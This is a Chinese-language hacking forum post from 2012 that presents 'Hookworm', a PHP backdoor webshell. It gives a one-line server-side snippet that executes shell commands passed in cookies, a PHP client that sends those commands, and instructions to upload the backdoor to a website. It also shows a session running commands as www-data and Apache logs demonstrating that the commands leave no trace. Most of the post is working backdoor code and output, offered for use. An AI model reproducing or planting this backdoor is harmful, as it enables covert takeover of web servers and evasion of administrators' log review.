切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
234 PHP后门 SHELL Hookworm[复制链接]
发表于 2012-8-26 20:31:42 | 显示全部楼层 |!read_mode!
用COOKIES传递 APACHE日志无记录! 客服端
  1. <?php if(isset($_COOKIE['wormcmd'])) {echo $_COOKIE['delim'] . shell_exec($_COOKIE['wormcmd']) . $_COOKIE['delim'];}?>
复制代码
服务端 Hookworm.php :
  1. <?php
  2. echo "Enter the IP of the host to connect to:\n";
  3. $host = trim(fgets(STDIN, 256));
  4. echo "Host set to $host\n";
  5. echo "Enter the relative path to the Hookworm (ex: /index.php):\n";
  6. $file = trim(fgets(STDIN, 256));
  7. echo "Enter the delimiter you'd like to use (ex: '***')";
  8. $delim = trim(fgets(STDIN, 256));
  9. if ($delim == '') $delim = "***"; // delimiter

  10. while (1) {
  11.         echo "hookworm> ";
  12.         $command = trim(fgets(STDIN, 256));
  13.         if ($command == 'quit' || $command == 'exit') break;
  14.         $out = "GET $file HTTP/1.1\r\n";
  15.         $out .= "Host: $host\r\n";
  16.         $out .= "Connection: Close\r\n";
  17.         $out .= "Cookie: wormcmd=$command; delim=$delim\r\n";
  18.         $out .= "\r\n";
  19.         if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;

  20.         fwrite($fp, $out);
  21.         $str = "";
  22.         //read in a string which is the contents of the required file
  23.         while (!feof($fp)) {
  24.                 $str.=fgets($fp, 512);
  25.         }
  26.         fclose($fp);

  27.         $output_start = strpos($str,$delim)+strlen($delim);
  28.         $output_end = strpos($str,$delim,$output_start);
  29.         $output = substr($str, $output_start, $output_end-$output_start);

  30.         echo $output;
  31. }
  32. ?>
复制代码

安装PHP apt-get install php5-cli

把客服端上传到网站

连接:


  1. root@Dis9Team:/pen/door# php hookworm.php
  2. Enter the IP of the host to connect to:
  3. 5.5.5.2
  4. Host set to 5.5.5.2
  5. Enter the relative path to the Hookworm (ex: /index.php):
  6. /door2.php
  7. Enter the delimiter you'd like to use (ex: '***')
  8. hookworm> id
  9. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  10. hookworm> pwd
  11. /var/www
  12. hookworm>
复制代码
查看下APACHE日志

  1. root@ubuntu:/var/log/apache2# cat access.log  | grep door2.php
  2. 5.5.5.3 - - [10/Aug/2012:13:58:15 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  3. 5.5.5.3 - - [10/Aug/2012:13:58:17 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  4. 5.5.5.3 - - [10/Aug/2012:13:58:17 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  5. 5.5.5.3 - - [10/Aug/2012:13:58:36 +0800] "GET /door2.php HTTP/1.1" 200 293 "http://5.5.5.2/" "Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0"
  6. 5.5.5.3 - - [10/Aug/2012:13:59:28 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  7. 5.5.5.3 - - [10/Aug/2012:13:59:29 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  8. 5.5.5.3 - - [10/Aug/2012:13:59:30 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  9. 5.5.5.3 - - [10/Aug/2012:13:59:30 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  10. 5.5.5.3 - - [10/Aug/2012:14:00:05 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  11. 5.5.5.3 - - [10/Aug/2012:14:00:07 +0800] "GET /door2.php HTTP/1.1" 200 211 "-" "-"
  12. 5.5.5.3 - - [10/Aug/2012:14:00:43 +0800] "GET /door2.php HTTP/1.1" 200 272 "-" "-"
  13. 5.5.5.3 - - [10/Aug/2012:14:00:47 +0800] "GET /door2.php HTTP/1.1" 200 227 "-" "-"
  14. root@ubuntu:/var/log/apache2#
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 08:52

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部